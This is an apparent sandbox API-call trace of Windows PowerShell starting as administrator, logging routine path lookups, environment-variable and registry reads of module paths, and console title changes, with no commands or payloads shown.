	[0343.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.219] CoTaskMemAlloc (cb=0x804) returned 0x1b795470
	[0343.219] GetConsoleTitleW (in: lpConsoleTitle=0x1b795470, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0343.469] CoTaskMemFree (pv=0x1b795470) 
	[0343.491] CoTaskMemAlloc (cb=0x804) returned 0x1b795d20
	[0343.491] GetConsoleTitleW (in: lpConsoleTitle=0x1b795d20, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0343.492] CoTaskMemFree (pv=0x1b795d20) 
	[0343.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.494] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0343.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.988] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0343.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0344.009] SetConsoleCtrlHandler (HandlerRoutine=0x27268dc, Add=1) returned 1
	[0344.339] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0344.341] CoCreateGuid (in: pguid=0xcdb90 | out: pguid=0xcdb90*(Data1=0x144891c4, Data2=0x19d6, Data3=0x4a62, Data4=([0]=0xb9, [1]=0x17, [2]=0x78, [3]=0xbf, [4]=0x51, [5]=0xd1, [6]=0x37, [7]=0xe4))) returned 0x0
	[0344.341] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.342] CoTaskMemFree (pv=0x34ee80) 
	[0344.344] WinSqmIsOptedIn () returned 0x0
	[0344.345] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.345] CoTaskMemFree (pv=0x34ee80) 
	[0344.345] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.345] CoTaskMemFree (pv=0x34ee80) 
	[0344.346] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.346] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.346] CoTaskMemFree (pv=0x34ee80) 
	[0344.347] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.347] CoTaskMemFree (pv=0x34ee80) 
	[0344.347] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.347] CoTaskMemFree (pv=0x34ee80) 
	[0344.349] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.349] CoTaskMemFree (pv=0x34ee80) 
	[0344.350] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.350] CoTaskMemFree (pv=0x34ee80) 
	[0344.350] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.350] CoTaskMemFree (pv=0x34ee80) 
	[0344.356] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.356] CoTaskMemFree (pv=0x34ee80) 
	[0344.623] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.623] CoTaskMemFree (pv=0x34ee80) 
	[0344.623] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.623] CoTaskMemFree (pv=0x34ee80) 
	[0344.623] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0344.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0344.623] CoTaskMemFree (pv=0x34ee80) 
	[0345.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.521] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0345.521] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0345.521] CoTaskMemFree (pv=0x34ee80) 
	[0345.522] CoTaskMemAlloc (cb=0xcc) returned 0x370ea0
	[0345.522] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x370ea0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0345.523] CoTaskMemFree (pv=0x370ea0) 
	[0345.523] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd708 | out: phkResult=0xcd708*=0x328) returned 0x0
	[0345.523] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd68c, lpData=0x0, lpcbData=0xcd688*=0x0 | out: lpType=0xcd68c*=0x2, lpData=0x0, lpcbData=0xcd688*=0x6c) returned 0x0
	[0345.523] CoTaskMemAlloc (cb=0x70) returned 0x3052d0
	[0345.523] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd65c, lpData=0x3052d0, lpcbData=0xcd658*=0x6c | out: lpType=0xcd65c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd658*=0x6c) returned 0x0
	[0345.523] CoTaskMemFree (pv=0x3052d0) 
	[0345.523] CoTaskMemAlloc (cb=0xcc) returned 0x370ea0
	[0345.523] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x370ea0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0345.523] CoTaskMemFree (pv=0x370ea0) 
	[0345.523] CoTaskMemAlloc (cb=0xcc) returned 0x370ea0
	[0345.523] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x370ea0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0345.523] CoTaskMemFree (pv=0x370ea0) 
	[0345.526] RegCloseKey (hKey=0x328) returned 0x0
	[0345.526] CoTaskMemAlloc (cb=0xcc) returned 0x370ea0
	[0345.526] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x370ea0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0345.526] CoTaskMemFree (pv=0x370ea0) 
	[0345.526] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd708 | out: phkResult=0xcd708*=0x328) returned 0x0
	[0345.526] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd68c, lpData=0x0, lpcbData=0xcd688*=0x0 | out: lpType=0xcd68c*=0x0, lpData=0x0, lpcbData=0xcd688*=0x0) returned 0x2
	[0345.527] RegCloseKey (hKey=0x328) returned 0x0
	[0345.534] CoTaskMemAlloc (cb=0x20c) returned 0x2b8130
	[0345.535] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2b8130 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0345.536] CoTaskMemFree (pv=0x2b8130) 
	[0345.536] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0xcd290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0345.537] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0345.538] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0345.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.538] CoTaskMemFree (pv=0x34ee80) 
	[0345.539] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0345.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.539] CoTaskMemFree (pv=0x34ee80) 
	[0345.540] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0345.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.540] CoTaskMemFree (pv=0x34ee80) 
	[0345.540] CoTaskMemAlloc (cb=0x104) returned 0x34ee80
	[0345.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34ee80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.540] CoTaskMemFree (pv=0x34ee80) 
	[0345.542] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd4f8 | out: phkResult=0xcd4f8*=0x330) returned 0x0
	[0345.542] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd50c, lpData=0x0, lpcbData=0xcd508*=0x0 | out: lpType=0xcd50c*=0x1, lpData=0x0, lpcbData=0xcd508*=0x74) returned 0x0
	[0345.543] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd47c, lpData=0x0, lpcbData=0xcd478*=0x0 | out: lpType=0xcd47c*=0x1, lpData=0x0, lpcbData=0xcd478*=0x74) returned 0x0
	[0345.812] CoTaskMemAlloc (cb=0x78) returned 0x3052d0
	[0345.812] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0xcd44c, lpData=0x3052d0, lpcbData=0xcd448*=0x74 | out: lpType=0xcd44c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd448*=0x74) returned 0x0
	[0345.812] CoTaskMemFree (pv=0x3052d0) 
	[0345.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0345.812] SetErrorMode (uMode=0x1) returned 0x1
